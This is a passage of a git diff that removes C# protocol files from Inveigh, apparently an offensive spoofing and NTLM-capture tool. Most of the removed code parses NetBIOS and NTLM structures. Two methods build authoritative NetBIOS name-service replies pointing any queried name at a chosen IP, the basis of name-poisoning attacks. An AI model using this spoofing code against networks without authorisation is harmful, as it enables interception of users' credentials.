DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ - -namespace Quiddity.NTLM -{ - class NTLMv1Response - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/b88739c6-1266-49f7-9d22-b13923bd8d66 - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/NTLM/Structures/NTLMv2ClientChallenge.cs b/Inveigh/Protocols/Quiddity/Protocols/NTLM/Structures/NTLMv2ClientChallenge.cs deleted file mode 100644 index cbda85b..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/NTLM/Structures/NTLMv2ClientChallenge.cs +++ /dev/null @@ -1,39 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ - -namespace Quiddity.NTLM -{ - class NTLMv2ClientChallenge - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/aee311d6-21a7-4470-92a5-c4ecb022a87b - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/NTLM/Structures/NTLMv2Response.cs b/Inveigh/Protocols/Quiddity/Protocols/NTLM/Structures/NTLMv2Response.cs deleted file mode 100644 index 0c26bff..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/NTLM/Structures/NTLMv2Response.cs +++ /dev/null @@ -1,39 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ - -namespace Quiddity.NTLM -{ - class NTLMv2Response - { - //https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/d43e2224-6fc3-449d-9f37-b90b55a29c80 - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSNSChecker.cs b/Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSNSChecker.cs deleted file mode 100644 index cbb9d2e..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSNSChecker.cs +++ /dev/null @@ -1,76 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.DNS; -using Quiddity.Support; -using System; -using System.Collections.Generic; -using System.Linq; -using System.Net; -using System.Text; - -namespace Quiddity.NetBIOS -{ - class NetBIOSNSChecker : DNSChecker - { - /// method GetBytes returns reply buffer. - public static byte[] GetBytes(NetBIOSNSHeader header, NetBIOSNSQuestion question, uint ttl, string replyIP) - { - byte[] rdata = Utilities.BlockCopy(new byte[2], IPAddress.Parse(replyIP).GetAddressBytes()); - - NetBIOSNSHeader responseHeader = new NetBIOSNSHeader - { - ID = header.ID, - R = true, - Opcode = "0000", - AA = true, - TC = false, - RD = true, - RA = false, - Z = "00", - B = false, - RCode = "0000", - QDCount = 0, - ANCount = 1 - }; - - NetBIOSNSResource resource = new NetBIOSNSResource(); - resource.Name = question.QName; - resource.Type = question.QType; - resource.Class = question.QClass; - resource.TTL = ttl; - resource.RDLength = 6; - resource.RData = rdata; - - return Utilities.BlockCopy(responseHeader.GetBytes(), resource.GetBytes()); - } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSNSHeader.cs b/Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSNSHeader.cs deleted file mode 100644 index 88255a3..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSNSHeader.cs +++ /dev/null @@ -1,135 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.DNS; -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.NetBIOS -{ - class NetBIOSNSHeader : DNSHeader - { - // https://datatracker.ietf.org/doc/html/rfc1002 - public bool R { get; set; } // 1 bit - public bool B { get; set; } // 1 bit - public NetBIOSNSHeader() - { - - } - - public NetBIOSNSHeader(byte[] data) - { - ReadBytes(data, 0); - } - - protected override void ReadFlags() - { - string flags = Convert.ToString(BitConverter.ToUInt16(this.Flags, 0), 2).PadLeft(16, '0'); - - if (string.Equals(flags.Substring(0, 1), "1")) - { - this.R = true; - } - - this.Opcode = flags.Substring(1, 4); - - if (string.Equals(flags.Substring(5, 1), "1")) - { - this.AA = true; - } - - if (string.Equals(flags.Substring(6, 1), "1")) - { - this.TC = true; - } - - if (string.Equals(flags.Substring(7, 1), "1")) - { - this.RD = true; - } - - if (string.Equals(flags.Substring(8, 1), "1")) - { - this.RA = true; - } - - this.Z = flags.Substring(9, 2); - - if (string.Equals(flags.Substring(11, 1), "1")) - { - this.B = true; - } - - this.RCode = flags.Substring(12, 4); - } - - protected override void WriteFlags() - { - string flags = this.R ? "1" : "0"; - flags += this.Opcode; - flags += this.AA ? "1" : "0"; - flags += this.TC ? "1" : "0"; - flags += this.RD ? "1" : "0"; - flags += this.RA ? "1" : "0"; - flags += this.Z; - flags += this.B ? "1" : "0"; - flags += this.RCode; - byte[] bytes = new byte[2]; - - for (int i = 0; i < 2; ++i) - { - bytes[i] = Convert.ToByte(flags.Substring(8 * i, 8), 2); - } - - this.Flags = bytes; - } - - public byte[] Parse(uint ttl, string ip, byte[] data, out string name, out string type) - { - this.ReadBytes(data, 0); - name = ""; - type = ""; - - if (this.QDCount == 1 && this.ANCount == 0) - { - NetBIOSNSQuestion question = new NetBIOSNSQuestion(); - question.ReadBytes(data, 12); - NetBIOSNSResource response = new NetBIOSNSResource(); - return response.GetBytes(question, ttl, ip, this.ID); - } - - return null; - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSNSPacket.cs b/Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSNSPacket.cs deleted file mode 100644 index 84fd653..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSNSPacket.cs +++ /dev/null @@ -1,93 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.Support; -using System; -using System.Collections.Generic; -using System.Linq; -using System.Net; -using System.Text; - -namespace Quiddity.NetBIOS -{ - class NetBIOSNSPacket - { - public NetBIOSNSHeader Header { get; set; } - public NetBIOSNSQuestion Question { get; set; } - public NetBIOSNSResource Resource { get; set; } - - public NetBIOSNSPacket(byte[] data) - { - ReadBytes(data); - } - - public NetBIOSNSPacket ReadBytes(byte[] data) - { - this.Header = new NetBIOSNSHeader(data); - this.Question = new NetBIOSNSQuestion(data); - return this; - } - - public byte[] GetBytes(uint ttl, string replyIP) - { - byte[] rdata = Utilities.BlockCopy(new byte[2], IPAddress.Parse(replyIP).GetAddressBytes()); - - this.Header = new NetBIOSNSHeader - { - ID = this.Header.ID, - R = true, - Opcode = "0000", - AA = true, - TC = false, - RD = true, - RA = false, - Z = "00", - B = false, - RCode = "0000", - QDCount = 0, - ANCount = 1 - }; - - this.Resource = new NetBIOSNSResource - { - Name = this.Question.QName, - Type = this.Question.QType, - Class = this.Question.QClass, - TTL = ttl, - RDLength = 6, - RData = rdata - }; - - return Utilities.BlockCopy(this.Header.GetBytes(), this.Resource.GetBytes()); - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSNSQuestion.cs b/Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSNSQuestion.cs deleted file mode 100644 index 2285b2f..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSNSQuestion.cs +++ /dev/null @@ -1,162 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.DNS; -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; -using System.Text.RegularExpressions; - -namespace Quiddity.NetBIOS -{ - class NetBIOSNSQuestion : DNSQuestion - { - public NetBIOSNSQuestion() - { - - } - - public NetBIOSNSQuestion(byte[] data) - { - ReadBytes(data, 12); - } - - protected override string ConvertName() - { - byte[] nameData = new byte[30]; - Buffer.BlockCopy(this.QName, 1, nameData, 0, 30); - string hex = BitConverter.ToString(nameData); - string[] nameArray = hex.Split('-'); - string characters = ""; - - foreach (string character in nameArray) - { - characters += new string(Convert.ToChar(Convert.ToInt16(character, 16)), 1); - } - - if (characters.Contains("CA")) - { - characters = characters.Substring(0, characters.IndexOf("CA")); - } - - int i = 0; - string nameSubstring = ""; - - do - { - byte characterByte = (byte)Convert.ToChar(characters.Substring(i, 1)); - characterByte -= 0x41; - nameSubstring += Convert.ToString(characterByte, 16); - i++; - } - while (i < characters.Length); - - i = 0; - string name = ""; - - do - { - name += (Convert.ToChar(Convert.ToInt16(nameSubstring.Substring(i, 2), 16))); - i += 2; - } - while (i < nameSubstring.Length - 1); - - if (characters.StartsWith("ABAC") && characters.EndsWith("AC")) - { - name = name.Substring(2); - name = name.Substring(0, name.Length - 1); - name = string.Concat("<01><02>", name, "<02>"); - } - - Regex printable = new Regex("[^\x00-\x7F]+"); - - if (printable.IsMatch(name)) - { - return ""; - } - - return name; - } - - protected override string GetType() - { - byte[] typeData = new byte[2]; - Buffer.BlockCopy(this.QName, 31, typeData, 0, 2); - string nbnsQuery = BitConverter.ToString(typeData); - string nbnsQueryType = ""; - - switch (nbnsQuery) - { - - case "41-41": - nbnsQueryType = "00"; - break; - - case "41-42": - nbnsQueryType = "01"; - break; - - case "41-43": - nbnsQueryType = "02"; - break; - - case "41-44": - nbnsQueryType = "03"; - break; - - case "43-41": - nbnsQueryType = "20"; - break; - - case "42-4C": - nbnsQueryType = "1B"; - break; - - case "42-4D": - nbnsQueryType = "1C"; - break; - - case "42-4E": - nbnsQueryType = "1D"; - break; - - case "42-4F": - nbnsQueryType = "1E"; - break; - - } - - return nbnsQueryType; - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSNSResource.cs b/Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSNSResource.cs deleted file mode 100644 index 89d136a..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSNSResource.cs +++ /dev/null @@ -1,68 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.DNS; -using Quiddity.Support; -using System; -using System.Collections.Generic; -using System.Linq; -using System.Net; -using System.Text; - -namespace Quiddity.NetBIOS -{ - class NetBIOSNSResource : DNSResource - { - - public byte[] GetBytes(NetBIOSNSQuestion requestQuestion, uint ttl, string reply, byte[] id) - { - byte[] rdata = Utilities.BlockCopy(new byte[2], IPAddress.Parse(reply).GetAddressBytes()); - - NetBIOSNSHeader responseHeader = new NetBIOSNSHeader - { - ID = id, - QDCount = 0, - ANCount = 1 - }; - - this.Name = requestQuestion.QName; - this.Type = requestQuestion.QType; - this.Class = requestQuestion.QClass; - this.TTL = ttl; - this.RDLength = 6; - this.RData = rdata; - - return Utilities.BlockCopy(responseHeader.GetBytes(), this.GetBytes()); - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSSessionService.cs b/Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSSessionService.cs deleted file mode 100644 index 70e8dbe..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/NetBIOS/NetBIOSSessionService.cs +++ /dev/null @@ -1,82 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System.IO; - -namespace Quiddity.NetBIOS -{ - class NetBIOSSessionService - { - // https://tools.ietf.org/html/rfc1002 - public byte Type { get; set; } - public byte Flags { get; set; } - public ushort Length { get; set; } - - public NetBIOSSessionService() - { - this.Type = 0x00; - this.Flags = 0x00; - } - - public NetBIOSSessionService(byte[] data) - { - ReadBytes(data); - } - - public void ReadBytes(byte[] data) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - this.Type = packetReader.ReadByte(); - this.Flags = packetReader.ReadByte(); - this.Length = packetReader.BigEndianReadUInt16(); - } - - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.Write(this.Type); - packetWriter.Write(this.Flags); - packetWriter.BigEndianWrite(this.Length); - return memoryStream.ToArray(); - } - - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/PacketReader.cs b/Inveigh/Protocols/Quiddity/Protocols/PacketReader.cs deleted file mode 100644 index 904b994..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/PacketReader.cs +++ /dev/null @@ -1,74 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.IO; - -namespace Quiddity -{ - class PacketReader : BinaryReader - { - public PacketReader(Stream stream) : base(stream) { } - - public ushort BigEndianReadUInt16() - { - byte[] data = base.ReadBytes(2); - Array.Reverse(data); - return BitConverter.ToUInt16(data, 0); - } - - public uint BigEndianReadUInt32() - { - byte[] data = base.ReadBytes(4); - Array.Reverse(data); - return BitConverter.ToUInt32(data, 0); - } - - public byte[] BigEndianReadBytes(int count) - { - byte[] data = base.ReadBytes(count); - Array.Reverse(data); - return data; - } - - public string ReadBinary(int count) - { - - if (count == 1) - { - return Convert.ToString(base.ReadByte(), 2).PadLeft(8, '0'); - } - - return Convert.ToString(BitConverter.ToUInt16(BigEndianReadBytes(count), 0), 2).PadLeft(count * 8, '0'); - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/PacketWriter.cs b/Inveigh/Protocols/Quiddity/Protocols/PacketWriter.cs deleted file mode 100644 index d5fa611..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/PacketWriter.cs +++ /dev/null @@ -1,76 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.IO; -using System.Text; - -namespace Quiddity -{ - class PacketWriter : BinaryWriter // todo optimize - { - public PacketWriter(Stream stream) : base(stream) { } - - public void BigEndianWrite(ushort number) - { - byte[] data = BitConverter.GetBytes(number); - Array.Reverse(data); - base.Write(data); - } - - public void BigEndianWrite(uint number) - { - byte[] data = BitConverter.GetBytes(number); - Array.Reverse(data); - base.Write(data); - } - - public void BigEndianWrite(int number) - { - byte[] data = BitConverter.GetBytes(number); - Array.Reverse(data); - base.Write(data); - } - - public void BigEndianWrite(byte[] data) - { - Array.Reverse(data); - 